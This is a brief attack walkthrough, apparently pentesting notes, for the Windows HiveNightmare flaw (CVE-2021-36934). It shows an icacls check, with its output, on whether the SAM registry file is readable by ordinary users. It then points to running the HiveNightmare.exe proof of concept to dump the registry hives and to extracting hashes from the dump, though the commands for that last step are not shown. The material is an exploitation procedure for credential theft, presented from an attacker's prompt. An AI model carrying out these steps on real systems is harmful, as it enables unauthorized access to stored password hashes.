CVE-2021-36934 HiveNightmare
1 - Check if target is vulnerable
C:\hacker> icacls c:\Windows\System32\config\SAM
C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 filesWe are vulnerable since the file is readable by BUILTIN\Users
2 - Dump Registry Hives
This PoC can be used:
.\HiveNightmare.exe3 - Extract Hashes from dump
From a linux host:
Last updated